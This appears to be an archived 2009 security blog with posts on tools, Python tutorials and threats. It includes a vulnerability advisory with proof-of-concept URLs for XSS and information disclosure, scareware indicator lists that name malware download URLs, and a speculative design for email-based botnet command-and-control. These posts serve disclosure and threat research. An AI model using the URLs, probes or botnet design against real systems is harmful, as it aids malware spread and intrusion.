For all the computer nerds that spend huge amounts of time on their PC's don't forget to download
http://www.stereopsis.com/flux/

Support currently for XP/Vista and Mac OS X.

Direct quote from F.lux "it makes the color of your computer's display adapt to the time of day, warm at night and like sunlight during the day.

It's even possible that you're staying up too late because of your computer. You could use f.lux because it makes you sleep better, or you could just use it just because it makes your computer look better."

Mac OS X:SnowChecker

2009-11-03T03:14:00.001-11:00

Just like Linux, Windows, Unix or Mac, we all
love free, so here is SnowChecker for Mac OS X.

Why:Well if you have been waiting to upgrade
to Snow Leopard, and did not want to check an entire list of compatibility lists, just use SnowChecker.

http://snowleopard.wikidot.com/snowchecker

Operating Systems and Useability

2009-11-03T01:50:00.003-11:00

[Disclaimer: I make a lot of sweeping generalizations on this blog article]
I always like the debate about operating systems, especially when the discussion revolves around security. On one side you have the Macs which run a modified version of Unix, Darwin OS, on the other side you have the Windows folks, and then there are the Linux(just a kernel) and Unix guys, while I can not cover each OS here comprehensively I will just try to highlight some really interesting observations about Linux.

The reason, I was reading this:
http://www.ubuntugeek.com/is-ubuntu-ready-for-a-non-tech-savvy-girlfriend.html and this &
http://laptoplogic.com/resources/ubuntu-ready-for-your-gf.

While the document seems to primarily focus on a specific Linux distro: Ubuntu, I beg to differ and argue that any OS is easy to use dependent on what the user plans to use the OS for(useage or useability).

In most cases the average consumer or user, just wants to surf the web, check email, and watch some videos, with some word processing sprinkled in between. Any OS can probably perform this task with some minor exceptions, especially in light of the fact that Google seems to have noticed this. Google is planning to target audiences with Chrome OS later on in 2010, with the beta still available for download currently.Just by testing out the beta in a virtual machine, it seems Google is very smart in figuring out what consumers want and need, the OS is very simply in nature and not too complicated when compared to other Linux distro's.

It's also interesting to note that Wal-Mart is already shipping and selling their Everex PC for $130 and it runs the gOS (good operating system) another linux variant based on debian just like Ubuntu.

In addition OLPC (one laptop per child) is also making waves with their donations of laptops that run Linux to Africa and other countries that need them.

Nevertheless, the question remains, will this be enough to woo most customers to switch from the tried and trusted Windows-very user-centric OS with about 80% as the majority of it' s users to Linux?

Overall, I am impressed with the progress being made in terms of Linux and the coverage Linux is getting, hopefully this will mean more people using Linux.

In conclusion, most users use will use what is simple and works compared to whats complex and secure, good case in point is Windows Vista which was built with security in mind, but the user just did not see that, another reason why I-phones and Macs are a plus with user's at the end of the day, usability and simplicity will always win customers over, and some people are really devoted to making good products.

Bucky's Python Programming Series

2009-11-02T00:52:00.003-11:00

Since there are over 40 videos, we recommend everyone to continue with their Python training from Bucky's YouTube Channel TheNewBoston. EvilFingers is NOT associated with Bucky, although we did paste his video series here, because we prefer to educate our users in Python and also to create awareness in scripting on an overall.

Analysis or Engineering alone, cannot survive without proper integration into other fields. Scripting aids in faster analysis in some situations and scripting could automate certain Engineering tasks too. We believe that Scripting alone[without any human intervention] cannot do the job, because fortunately or unfortunately we are the ones who created it.

So, kindly continue going over his video channel for completing your Python Series training. We will keep you posted if we find any other interesting, in depth Python Series. Although we want to lead you to his channel directly, instead of pasting a blog with each embedded link, we thought of grouping it up and giving it in this one:

Python Programming Tutorial - 11 - Editing Sequences
Python Programming Tutorial - 12 - More List Functions
Python Programming Tutorial - 13 - Slicing Lists
Python Programming Tutorial - 14 - Intro to Methods
Python Programming Tutorial - 15 - More Methods
Python Programming Tutorial - 16 - Sort and Tuples
Python Programming Tutorial - 17 - Strings n Stuff
Python Programming Tutorial - 18 - Cool String Methods
Python Programming Tutorial - 19 - Dictionary
Python Programming Tutorial - 20 - If Statement
Python Programming Tutorial - 21 - else and elif
Python Programming Tutorial - 22 - Nesting Statements
Python Programming Tutorial - 23 - Comparison Operators
Python Programming Tutorial - 24 - And and Or
Python Programming Tutorial - 25 - For and While Loops
Python Programming Tutorial - 26 - Infinite Loops and Break
Python Programming Tutorial - 27 - Building Functions
Python Programming Tutorial - 28 - Default Parameters
Python Programming Tutorial - 29 - Multiple Parameters
Python Programming Tutorial - 30 - Parameter Types
Python Programming Tutorial - 31 - Tuples as Parameters
Python Programming Tutorial - 32 - Object Oriented Program
Python Programming Tutorial - 33 - Classes and Self
Python Programming Tutorial - 34 - Subclasses Superclasses
Python Programming Tutorial - 35 - Overwrite Variable on Sub
Python Programming Tutorial - 36 - Multiple Parent Classes
Python Programming Tutorial - 37 - Constructors
Python Programming Tutorial - 38 - Import Modules
Python Programming Tutorial - 39 - reload Modules
Python Programming Tutorial - 40 - Getting Module Info
Python Programming Tutorial - 41 - Working with Files
Python Programming Tutorial - 42 - Reading and Writing
Python Programming Tutorial - 43 - Writing Lines

It is really good set of videos and definitely something that would help your Python skills. Thanks to Bucky for all his efforts in sharing his programming/coding skills.

- EF

SimBloSys - Simple Blog System: multiple vulnerabilities

2009-11-01T23:19:00.002-11:00

While this blog software isn't known it is a really nice project, it makes use of ATOM instead of a SQL database, a few vulnerabilities where discovered in this product.

1. Advisory: SimBloSys – Simple Blog System ~ Multiple Vulnerabilities
2. Version Affected: 0.1,0.2
3. Component(s) Affected: source.php,index.php
4. Release Date: 02/11/2009
5. Background: SimBloSys is a GPL3 licensed blog system based on ATOM files.
Developed by whitone aka Stefano Cotta Ramusino (http://www.labinf.polito.it/whitone/)
6. Description:
XSS, HPP, Disclosure vulnerability, possible LFI have been found.
6.1 XSS & HPP ~ page affected: source.php
No checks are carried, a malicious user may inject client side scripts.
6.2 Disclosure vulnerability ~ page affected: index.php
Various informations are disclosed through the use of phpinfo().
6.3 checks are done only on file extension, every php file on the local webserver
with the right permissions could be seen.
7. Proof Of Concept:
7.1 XSS ~ http://localhost:80/source.php?page=
7.2 HPP ~ http://localhost:80/source.php?page=index.php&page=
7.3 Disclosure ~ http://localhost:80/index.php?info=1
8. Credits: Davide “ocean” Quarta ~ http://inseclab.netsons.org
9. Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
regards,
ocean

Malware Intelligence Linkedin Group

2009-11-01T12:25:00.000-11:00

Malware Intelligence is a personal project for the moment is in its infancy and is part of a future website that I will be making available to the entire community of Information Security in general and in particular Security Antivirus.

Then leave it up to capture a section of the site.

Its creation was motivated by a number of safety projects whose intent is to channel them through the channel but at the same time projecting to all who wish to collaborate.

At this time the group has 65 members and still haven't released the projects (though I hope to do to start with all of next year). As all those who wish to participate are welcome.

They can access the group from here.

Jorge Mieres

Bucky's Python Programming Tutorial - 10 - Slicing

2009-11-01T12:22:00.001-11:00

Thank you for checking out EvilFingers Blog.

EF

Bucky's Python Programming Tutorial - 9 - Sequences and Lists

2009-10-31T12:38:00.001-11:00

Now that we have come this far, Bucky is now training on Python Sequence and Lists.

EF

Bucky's Python Programming Tutorial - 8 - Raw Input

2009-10-31T06:59:00.001-11:00

Video on Python Raw Input:

Enjoy the show!

EF

Prevx - PC & Internet Security

2009-10-31T06:21:00.003-11:00

Prevx - PC and Internet Security for Home & Families, Businesses, Enterprises, Banks, Financial, eCommerce, and their customers.

Prevx does a great comparison of Anti-Virus vendors by showing the malwares & other that were failed to be detected by AV tools.

Products & Services they offer:

The reason for us talking about Prevx here is because, it would have been a totally new business model for 2001 when Prevx was originally formed. It is an interesting way to compete AV's openly to say how many detection failures has happened during their tests.

This could do one of the following:

(1) Awareness among Prevx viewers:

People who view this comparison chart get an idea of whats missing in each and they could choose one with minimum misses.

(2) Buy Prevx tools:

If Prevx is to the level of finding out what others are lacking, then it generally means that they would make their tools detect stuff, that other tools lack.

(3) Scares the crap out of AV vendors:

Well, it is just a possibility that AV vendors might get scared of their public image and try covering their lack of detection by:

(a) Paying off reality, to cover their weakness from public exposure.

(b) Buying samples/signature or other details of these misses.

(c) Working on fixing their tools, without attempting to contact these vendors.

But in all the above cases(a,b and c) the AV vendors are always on their toes.

This is good business, not just in terms of money but also the way they actually directly or indirectly keep the AV vendors aggressive and alert to protect their business from falling off the cliff.

EF

Bucky's Python Programming Tutorial - 7 - More on Strings

2009-10-31T02:40:00.002-11:00

More on strings... strings, strings & strings...

Thank you for learning.

EF

Bucky's Python Programming Tutorial - 6 - Strings

2009-10-31T02:25:00.002-11:00

Stings and its manipulations on Python.

I think we should start calling these videos as the Bucky's series.

EF

Bucky's Python Programming Tutorial - 5 - How to Save Your Programs

2009-10-31T02:24:00.002-11:00

Having done, what you have done so far: How do you save your stuff?

Enjoy the video!

EF

Bucky's Python Programming Tutorial - 4 - Modules and Functions

2009-10-31T02:21:00.001-11:00

In this video Bucky is talking about functions:

Enjoy the show!

EF

SpyDLLRemover v 2.5 - PortableApps.com Release!

2009-10-30T18:08:00.002-11:00

We are glad that Nagareshwar was able to push out a major release for SpyDLLRemover v2.5, we made it into a great release at www.PortableApps.com.

Thanks to PortableApps guys and all the users who suggested very valuable update that made us go for our next major release with Win7 and other upgrades. This would be SpyDLLRemover v 3.0. It is under test phase.

SpyDLLRemover v 3.1 is under planning phase. If you have any features in mind, that you would like to have in SpyDLLRemover, do shoot us an email @ contact.fingers @ gmail.com or leave a comment to this blog. We will definitely consider all entries and respond to the entries even if the chances of implementing it is minimal.

Thank you for everything guys.

EF

EFBlog.net - Coming Soon!

2009-10-30T17:55:00.002-11:00

EFblog.net is the new EvilFingers Blog. Trying to come up with a new look and feel. We need LAMP and CSS guys for UI and Integrity. If you guys wish to contribute for EvilFingers community, feel free to contact us at any point of time.

Benefits: Knowledge is like fluid, flowing from one to another just like what happens @ EvilFingers. Members share their skills generously, since we believe that the more we share, the more we learn. Do feel free to contact us.

EF

Bucky's Python Programming Tutorial - 3 - Variables

2009-10-30T14:08:00.002-11:00

Bucky's video on Variables in Python.

- EF

Python Programming Tutorial - 2 - Numbers and Math

2009-10-30T14:02:00.008-11:00

More into numbers[Integer & float] & math on IDLE interpreter.

Thanks for taking your time to check it out.

EF

Python Programming Tutorial - 1 - Installing Python

2009-10-30T13:49:00.002-11:00

Python Programming Tutorial - 1 - Installing Python

Bucky from thenewboston channel is offering free python learning videos. If you guys really wanna learn more about python, this video gives you an introduction to installation of Python.

We will check out other tutorial videos that he is offering and start uploading here, one at a time.

EF

Total Security 2009 Removal Instructions

2009-10-30T09:57:00.001-11:00

This video released on Sep 30, 2009. This is great info.

Check it out!

EF

Google's Success: One of the major reasons

2009-10-30T04:26:00.002-11:00

When Google was hiring in 1999-2000, I was wondering why they were looking for Algorithm as major focus. They were hiring professionals who were strong with Algorithms, Programming Languages and Computer Architecture, something that I considered as basic stuff when in my college days. But then later, @ some point of time when I got into work, I started finding that foundations are harder to learn than the stuff that comes new.

It is always some new technology or new terminologies that people talk about in many of the community talks or meetings. It is normal to use technical jargon's to show off that someone knows something, but it is very hard to show off that someone knows basics. It is either proven by practical implementation on situations, or even in day to day life when you resolve a situation. Google looks for those kinds of people who are naturally talented in building stuff, destroying barriers and who goes beyond what is required. These are the people who are strong in their foundations. Foundations are most essential when it comes to building something big, especially something as big as Google.

This is one of the major reasons of Google's success. Bravo guys! Really good planning...

EF

Python Enhancement Proposals[PEP]

2009-10-30T04:19:00.002-11:00

Python Enhancement Proposals[PEP] is a list of enhancements written by the Python community. What we love about this is that, they have also written Python Styling a.k.a. coding conventions as a part of the PEP. This structuring looks more like a constitution of the Python Dynasty.

We [EvilFingers] are planning to launch Open Source Initiative[EFOSI] as a part of our tribute to the Python Community. LogsAnalytics[which will be releasing soon] will come with log parsers, log correlation and log analysis tools that would be purely coded in Python and will be open sourced for all our users to get the greater benefit off Python.

Thanks to Guido van Rossum for all of his contributions to the Python world. He works for Google.

EF

Mac Users: Here is your Anti-virus

2009-10-30T03:28:00.003-11:00

When we talked to some of the Mac users, they asked us if we recommend any good Anti-virus Software for Mac community. Although, we are planning to work on Mac tools, it will certainly take time for us to catch up.

Hence, for now we recommend "iAntiVirus", which is part of PCTools. Here is how it looks:[The following snapshots were taken from http://www.iantivirus.com/screenshots/ and PCTools/iAntiVirus Reserves all the rights]

Update Settings Window:

Settings Window:

Scanner Progress Window:

Quick Scan Window:

Main Window:

If you are interested in full version, you could purchase it at the iAntiVirus site.

If you have any questions or concerns, contact PCTools here.

EF

ZeuS and power Botnet zombie recruitment

2009-10-27T15:53:00.002-11:00

As I have said on several occasions, ZeuS botnets is one of the more "media" (hence one of the best known and popular), more aggressive and criminal activity that has more advanced functions that allow phishing attacks, monitor the zombies in real time and collect all this information through different protocols.

These activities primarily aggressive propose methodologies to obtain confidential information from compromised computers for some of the variants that are part of the family ZeuS, now have a wide range of fake pages of banks and financial institutions exclusively for the collection of information through phishing.

Also the possibility of having a monitoring module through which the botmaster can be displayed in real time absolutely everything that is done on the PC zombie (navigation webmail services, banking, online chatting, etc.) poses a serious threat directly undermines confidentiality.

And although many may seem a trivial issue, the mere fact of knowing that your developer updated every version of ZeuS, since 2007, approximately once per month, is an important point that marks the reason for its popularity in the environment under .

But nevertheless, despite all this still doesn't seem to be valued at its true implications are implicit security activities, not only of ZeuS but of any of the alternatives crimeware that daily bombard the Internet with their criminal actions.

Perhaps what follows I will show is a key to understanding the true extent of crime that have this type of activity. This is a botnet ZeuS with a short life span, but with a large amount of zombies that swarm recruited in his headquarters under the tutelage of "dealer" waiting for orders.

The following screenshot shows the zombies recruited only in Russia, in this case by the botmaster logged under the name "russian". This information is obtained through the filtering option, limiting the search with the acronym of the country (UK).

Now ... one of the questions that perhaps many times we become the talk of botnets is what recruiting is the ability they possess? and although the response is relative might say that has no limits, or that the limit will be given in terms of the capacity of servers used by botmasters.

But, following the example above, we have a sufficiently specific about the power of recruiting has, in this case, the botmaster "russian".

With an activity of three (3) months with an amount of 24.830 zombies. Something like ZeuS almost 276 infections per day. And if we follow the logic, statistically speaking, the number could quadruple over the year.

Furthermore, the ability to manage a botnet via web, also means that can be administered several at once, ie several botmasters can use the same web application (in this case ZeuS) to control "their" zombies. Thus, the user "russian" possesses a significant activity. But we can also obtain information from their peers who are managing zombies under the same domain.

For example, the user "system" has recruited 10.184 zombies but over a period of 30 days. Approximately 335 zombies per day. All through a single botnet ZeuS. Can you imagine how many ZeuS how are you are In-the-Wild?

While less activity botmaster has only 34 zombies, but less than 1 hour.

In summary, irrespective of length of activity of one or another botnet, the recruitment rate is very high.

This also means that prevention mechanisms aren't sufficiently effective, and indeed a recent study shows clearly that the mechanisms are elusive ZeuS incorporating sufficiently effective against the mechanisms of detection of many current anti-virus solutions.

However, under a more rigorous, current malware self-defense mechanisms incorporate increasingly effective anti-virus doesn't mean that they aren't effective. Furthermore, not all pass through the security solution and much of the responsibility rests with the user and that, ultimately and in accordance with rigorous aspect, a system isn't infected itself.

Related information
ZeuS, spam y certificados SSL
Eficacia de los antivirus frente a ZeuS
Especial!! ZeuS Botnet for Dummies
Botnet. Securización en la nueva versión de ZeuS
Fusión. Un concepto adoptado por el crimeware actual
ZeuS Carding World Template. (...) la cara de la botnet
Entidades financieras en la mira de la botnet Zeus II
Entidades financieras en la mira de la botnet Zeus I
LuckySploit, la mano derecha de Zeus
ZeuS Botnet. Masiva propagación de su troyano II
ZeuS Botnet. Masiva propagación de su troyano I

Jorge Mieres

What next in Botnets?

2009-10-25T20:20:00.004-11:00

For the past few weeks I had been thinking what could be next for Botnets to do C&C. As we have already seen it being having C&C over, IRC in older days, then it came to P2P, and then evolved to HTTP too some time back.

So What next?

Was thinking and thinking and then got it with a flash, how about Simple EMAIL communication is being used as C&C for the bots to receive commands from their bot-masters. That would be mess right, as this would be very difficult to track and stop.

Just think a bot having a bot-masters email ID integrated ( *** there could be more innovative way to have the bot-master ID, I will come to that point latter *** ) and then it calls home just by sending a mail to the bot-master and he responds back by command in the mail body, all encrypted. More over the master need not to run his own C&C server for mails, he could use any of the mail servers available in the internet, like GMail, Yahoo, Hotmail anything he feels like. all bots can respond to those IDs and the bot-master can just issue his commands to all incoming mails from the bots and issue commands, as most of the organizations and client machines will allow mail communication to happen, it will be really tough to stop. There could be more innovative ways to stop being reverse engineering , detection and Bot update mechanism, we all know about it more or less by now, and just think if all those mechanism is integrated, then it could be a big happening in the C&C of botnets.

This is just my thoughts, i am sure people around here in this community may have better thoughts on this concept, I would really appreciate your comments and thoughts on this article and this new future threat, which I think it could be.

All those who agree can please put together your thoughts about some detection mechanism, for this method. And all those who don't agree, I would appreciate to put your line of thoughts too, that will be helpful if i am thinking wrong.

Portable Apps Release

2009-10-24T20:26:00.002-11:00

Thanks to the team and you folks(users), our tool has been released by PortableApps. To check out the portableApps page click here.

Thank you.
EF

Metasploit Acquired by Rapid7

2009-10-21T03:49:00.003-11:00

For more info, click here.

Rapid7 is a Vulnerability Management company.

**********COPIED AND PASTED FROM HERE*******

Rapid7 Acquired Metasploit

October 21, 2009

I'm extremely pleased to announce Rapid7's acquisition of Metasploit, the leading open source penetration testing framework and world's largest database of public, tested exploits. We believe the acquisition deepens our leadership as the leading provider of vulnerability management, compliance and penetration testing solutions and will provide great value for our customers and partners.

As a result of the acquisition, we will leverage Metasploit technology to enhance our vulnerability management solution, Rapid7 NeXposeTM. At the same time we will not only maintain, but accelerate the open source framework Metasploit with dedicated resources and contributions. I’m also pleased to announce that HD Moore, the founder of Metasploit, will be joining Rapid7 full-time as Chief Architect of Metasploit and Chief Security Officer of Rapid7.

I'm excited about this news for a number of reasons:

The acquisition raises the bar to what our industry can expect from all those involved, be they vendors, end-users, partners or community members. Since joining Rapid7, I’ve learned about some of the key principles of network security: defense in depth, continuously identifying and fixing your vulnerabilities, and improving security through continuous investments in people, process, and technology. With this announcement we are embracing the role of industry innovator by providing better protection to you as our client, feeding the community and creating an environment open for dialog about the implementation of security best practices.
As a result of our union, we will be able to bring superior data on exploitability to our customers, helping them to prioritize and remediate key security issues. The exploit data will be directly embedded in our vulnerability management solution NeXpose, providing a whole new level of risk analysis capabilities to our clients, while ensuring that NeXpose, which will continue as a separate product, delivers the safest, most proactive and actionable vulnerability scanning capabilities in the industry.
We're thrilled that HD Moore and other key Metasploit contributors have joined Rapid7 to work full-time on the open source Metasploit Framework code. HD and the team will now have more dedicated resources and support to invest in exploit research and to create a broader penetration testing platform. As part of our support of the community, we will contribute vulnerability data from the NeXpose product to expand the accuracy and reliability of the Metasploit Framework, which will remain open source. It is a true win-win for everyone.
Finally, the combination of NeXpose and Metasploit will enable Rapid7 to continue to grow its relationship with partners and consultants, delivering improved technology and more comprehensive solutions for vulnerability management and penetration testing. Having a broader portfolio will further accelerate our dialog with our partner ecosystem to ensure that our solutions meet their needs.
Over the next weeks we will be providing additional details on our plans so please stay tuned to hear more from us. For additional information, please reference our press release on the acquisition as well as the FAQ below. If you have any feedback or suggestions regarding our announcement, I would love to hear from you.

Mike Tuchen,
President & CEO, Rapid7

**********COPIED AND PASTED FROM HERE*******

For FAQ on this go HERE.

- EF

Computer Weekly IT Blog Awards 2009

2009-10-21T00:19:00.002-11:00

Computer Weekly is coming up with the IT Blog Awards 2009. Thanks to Kalyan for sending a reminder email. We have enrolled "EvilFingers Blog" in the nominees. If you think that we are good for this award, kindly VOTE for us.

EF

Current business outlook caused by crimeware

2009-10-18T04:36:00.001-11:00

Undoubtedly, the current picture of global criminal activities that are channeled through the web form a round, dark business that is happening in the most underground of the different environments of the Internet, stealing private information through different "bugs"...

...that spread running different "plans" strategically designed, including developing applications to automate processes that are marketed criminal in the same environment underground, then transform everything into cash.

Without further ado ... image sums it up :)

Related information
CYBINT en el negocio de los ciber-delincuentes rusos
Software as a Service en la industria del malware
Los precios del crimeware ruso. Parte 2
Los precios del crimeware ruso. Parte 1
Comercio Ruso de versiones privadas de crimeware...
Automatización de procesos anti-análisis II

Jorge Mieres

A recent tour of scareware XVI

2009-10-17T05:20:00.003-11:00

Advanced Virus Remover
MD5: b3f4e680db0b4093737093afc5bd7ddd
IP: 92.241.177.207
Dominios asociados
1-vscodec-pro.com
10-open-davinci.com
advanced-virus-remover-2009.com
advanced-virus-remover2009.com
advanced-virusremover2009.com
advancedvirus-remover-2009.com
antivirus-2009-ppro.com
antivirus-scan-2009.com
best-scanpc.com
bestscanpc.com
bestscanpc.info
bestscanpc.net
blue-xxx-tube.com
downloadavr3.com
downloadavr4.com
onlinescanxppro.com
testavrdown.com
trucountme.com
vscodec-pro.com

Result: 21/41 (51.22%)

securitycentr.com (195.24.78.186), webscannertools.com (212.117.165.126) -
antivir-freescan.com/online (213.163.64.81) -
computervirusscanner31.com/scan1 (213.163.89.60) -
benharpergals.com/?pid=162&sid=c3d08e (89.248.174.61) -
iniegox.cn/installer.1.exe (91.213.29.250) -
avidentify.com (91.206.201.8) -
scan.helpyourpcsecuritynow.com/download/smrtprt/install.php (195.95.151.185) -
goxtrascan.com (91.212.107.103) -
virushooker.com (206.53.61.73) -
fastscansearch.net (64.86.16.101), globalscansearch.com (64.86.16.130), totalscansearch.com (64.86.16.100), totalscansearch.net (64.86.16.124) -
securitycodereviews.com/install/ws.exe, bestwebsitesecurity.com (62.90.136.237) -
weedruk.com/download (91.212.127.132) -
mycompscanner42.com (206.217.201.240), myvirusscanner2.com (206.217.201.136) -
myvirusscanner25.com/2 (69.4.230.204) -
fp.outerinfo.com/dispatcher.php, outerinfo.com (63.251.135.18) -
block-spyware.co.cc/htm6.exe (78.46.129.170) -
safefighter.com (83.233.30.66) -
keymydomains.com (193.169.12.26) -
trustsoldier.com (212.175.87.195) -

Perfect Defender 2009
IP: 206.161.120.40
United States Herndon Beyond The Network America Inc
Dominios asociados
agelesscommunity.com, air-titaniumusa.com, alcohol-treatmentcenter.com, antigreen.org, arkansasrobotics.com, barry-miller.com, brianperez.com, cocainedrugtreatment.com, combat-camera.com, pcfender.com, pcfsupport.com

PC MightyMax
MD5: e630ee28e264d060562cb567e7fa5ed0
IP: 208.38.128.164
United States Valrico Sonbry Marking International
Dominios asociados
pc-mm.com
pcmightymax.net
dllfix.net
pc-test.com
pcmightymax.net
Result: 1/41 (2.44%)

Nortel Antivirus
IP: 174.142.96.6
Canada Montreal Iweb Technologies Inc
Dominios asociados
nortel-antivirus-pro.com
nortel2010.com

Screen-Spy
MD5: 21b5e0a17c057a281b6e7a90c3f8ce7a
IP: 208.109.106.46
United States Scottsdale Godaddy.com Inc
Dominios asociados
logserver39.com, acespy.com, pchealthoptimizer.com, retinaxstudios.com, screen-spy.com, loanmodcrm.org
Result: 17/41 (41.46%)

SaferScan
MD5: cb9022235cc4ae3adc9f54cd49b81bf5
IP: 66.152.93.119
Canada Integrated Search Technologies
Dominios asociados
activexcash.net, instaldownload.com, installcash.com, power-scan.com, safer-scan.com, sexsearchbar.com, toolbarcash.com,
unlimitedsongs.net, xxxtoolbar.com

Result: 23/41 (56.10%)

Información relacionada
Una recorrida por los últimos scareware XV
Una recorrida por los últimos scareware XIV
Una recorrida por los últimos scareware XIII
Una recorrida por los últimos scareware XII
Una recorrida por los últimos scareware XI
Una recorrida por los últimos scareware X
Una recorrida por los últimos scareware IX
Una recorrida por los últimos scareware VIII
Una recorrida por los últimos scareware VII
Una recorrida por los últimos scareware VI
Una recorrida por los últimos scareware V
Una recorrida por los últimos scareware IV
Una recorrida por los últimos scareware III
Una recorrida por los últimos scareware II
Una recorrida por los últimos scareware I

Jorge Mieres

15 day summary - SANS - Cyber Security Awareness Month

2009-10-16T09:15:00.002-11:00

This is a great initiative taken by SANS.

Day 15 - Ports 995, 465, and 993 - Secure Email

Day 14 - port 514 - syslog

Day 13 - Proxies (TCP 3128, 8080 & ......)

Day 12 - Ports 161/162 Simple Network Management Protocol (SNMP)

Day 11 - RPCBind aka Portmapper

Day 10 - The Questionable Ports

Day 09 - Port 3389/tcp (RDP)

Day 08 - Port 25 - SMTP

Day 07 - Port 6667/8/9/7000 - IRC: is it evil?

Day 06 - ports 67&68 udp - bootp and dhcp

Day 05 - port 31337

Day 04 - Port 20/21 - FTP-data/FTP

Day 03 - Port 5900 - VNC

Day 02 - Port 0

Day 01 - Port 445 - SMB over TCP

It is really good to have someone/team, talking about valuable stuff that not many others think about.

Good work Sans!

- EF

SpyDLLRemover - 10,000 downloads from RootkitAnalytics.com

2009-10-16T09:09:00.003-11:00

Hello folks,

Just noticed that we reached 10,000 downloads for SpyDLLRemover from the main site, RootkitAnalytics.com.

PortableApps.com is now releasing SpyDLLRemover among their Security Suite of tools next week. The test release is here.

Thank you for your support guys.
- EF

Book of the Month - "The Art of Assembly Language"

2009-10-16T06:49:00.005-11:00

The Art of Assembly Language

Chapter Listings:

Contents

Chapter 1 : Hello,World of Assembly Language

Chapter 2 : Data Representation

Chapter 3 : Memory Access and Organization

Chapter 4 : Constants, Variables and Data Types

Chapter 5 : Procedures and Units

Chapter 6 : Arithmetic

Chapter 7 : Low Level Control Structures

Chapter 8 : Files

Chapter 9 : Advanced Arithmetic

Chapter 10: Macros and the HLA Compile Time Language

Chapter 11: Bit Manipulation

Chapter 12: The String Instructions

Chapter 13: The MMX Instruction Set

Chapter 14: Classes and Objects

Chapter 15: Mixed Language Programming

Appendix A: ASCII Character Set

Appendix B: The 80x86 Instruction Set

Index

This book deserved an applause for its:

Structural flow
Language [simplicity]
Overall content coverage

Thank you Randall Hyde - For sharing your skills in this book, and Thanks to NoStarch press for publishing it.

You can buy it at NoStarch Press, as both PDF and/or Paper copy.

- EF

Operating System Engineering - Assembly Language - MIT Materials

2009-10-16T05:14:00.005-11:00

Assembly Language programming links to several free materials available at Operating System Engineering course.

References page has reference to all the following materials:

Selection of Operating System Papers
Available on the 6.828 schedule.
UNIX

* The UNIX Time-Sharing System, Dennis M. Ritchie and Ken L.Thompson,. Bell System Technical Journal 57, number 6, part 2 (July-August 1978) pages 1905-1930. (local copy) You read this paper in 6.033.

* The Evolution of the Unix Time-sharing System, Dennis M. Ritchie, 1979.

* The C programming language (second edition) by Kernighan and Ritchie. Prentice Hall, Inc., 1988. ISBN 0-13-110362-8, 1998.

x86 Emulation

* QEMU - A fast and popular x86 platform and CPU emulator.

o User manual

* Bochs - A more mature, but quirkier and much slower x86 emulator. Bochs is generally a more faithful emulator of real hardware than QMEU.

o User manual

o Debugger reference

x86 Assembly Language

* PC Assembly Language, Paul A. Carter, November 2003. (local copy)

* Intel 80386 Programmer's Reference Manual, 1987 (HTML). (local copy - PDF) (local copy - HTML)

Much shorter than the full current Intel Architecture manuals below, but describes all processor features used in 6.828.

* IA-32 Intel Architecture Software Developer's Manuals, Intel, 2007. Local copies:

o Volume I: Basic Architecture

o Volume 2A: Instruction Set Reference, A-M

o Volume 2B: Instruction Set Reference, N-Z

o Volume 3A: System Programming Guide, Part 1

o Volume 3B: System Programming Guide, Part 2

* Multiprocessor references:

o MP specification

o IO APIC

* AMD64 Architecture Programmer's Manual.

Covers both the "classic" 32-bit x86 architecture and the new 64-bit extensions supported by the latest AMD and Intel processors.

* Writing inline assembly language with GCC:

o Brennan's Guide to Inline Assembly, Brennan "Mr. Wacko" Underwood

o Inline assembly for x86 in Linux, Bharata B. Rao, IBM

o GCC-Inline-Assembly-HOWTO, Sandeep.S

* Loading x86 executables in the ELF format:

o Tool Interface Standard (TIS) Executable and Linking Format (ELF).
The definitive standard for the ELF format.

PC Hardware Programming

* General PC architecture information

o Phil Storrs PC Hardware book, Phil Storrs, December 1998.

o Bochs technical hardware specifications directory.

* General BIOS and PC bootstrap

o BIOS Services and Software Interrupts, Roger Morgan, 1997.

o "El Torito" Bootable CD-ROM Format Specification, Phoenix/IBM, January 1995.

* VGA display - kern/console.c

o VESA BIOS Extension (VBE) 3.0, Video Electronics Standards Association, September 1998. (local copy)

o VGADOC, Finn Thøgersen, 2000. (local copy - text) (local copy - ZIP)

o Free VGA Project, J.D. Neal, 1998.

* Keyboard and Mouse - kern/console.c

o Adam Chapweske's resources.

* 8253/8254 Programmable Interval Timer (PIT) - inc/timerreg.h

o 82C54 CHMOS Programmable Interval Timer, Intel, October 1994. (local copy)

o Data Solutions 8253/8254 Tutorial, Data Solutions.

* 8259/8259A Programmable Interrupt Controller (PIC) - kern/picirq.*

o 8259A Programmable Interrupt Controller, Intel, December 1988.

* Real-Time Clock (RTC) - kern/kclock.*

o Phil Storrs PC Hardware book, Phil Storrs, December 1998. In particular:

+ Understanding the CMOS

+ A list of what is in the CMOS

o CMOS Memory Map, Padgett Peterson, May 1996.

o M48T86 PC Real-Time Clock, ST Microelectronics, April 2004. (local copy)

* 16550 UART Serial Port - kern/console.c

o PC16550D Universal Asynchronous Receiver/Transmitter with FIFOs, National Semiconductor, 1995.

o Technical Data on 16550, Byterunner Technologies.

o Interfacing the Serial / RS232 Port, Craig Peacock, August 2001.

* IEEE 1284 Parallel Port - kern/console.c

o Parallel Port Central, Jan Axelson.

o Parallel Port Background, Warp Nine Engineering.

o IEEE 1284 - Updating the PC Parallel Port, National Instruments.

o Interfacing the Standard Parallel Port, Craig Peacock, August 2001.

* IDE hard drive controller - fs/ide.c

o AT Attachment with Packet Interface - 6 (working draft), ANSI, December 2001.

o Programming Interface for Bus Master IDE Controller, Brad Hosler, Intel, May 1994.

o The Guide to ATA/ATAPI documentation, Constantine Sapuntzakis, January 2002.

* Sound cards (not supported in 6.828 kernel, but you're welcome to do it as a challenge problem!)

o Sound Blaster Series Hardware Programming Guide, Creative Technology, 1996.

o 8237A High Performance Programmable DMA Controller, Intel, September 1993.

o Sound Blaster 16 Programming Document, Ethan Brodsky, June 1997.

o Sound Programming, Inverse Reality.

* E100 Network Interface Card

o Intel 8255x 10/100 Mbps Ethernet Controller Family Open Source Software Developer Manual

o 82559ER Fast Ethernet PCI Controller Datasheet

o The 82559 EEPROM

Really Good Stuff.

- EF

ZDNET: Does software piracy lead to higher malware infection rates?

2009-10-16T04:45:00.001-11:00

Does software piracy lead to higher malware infection rates? - Very nice posting... something to think about...

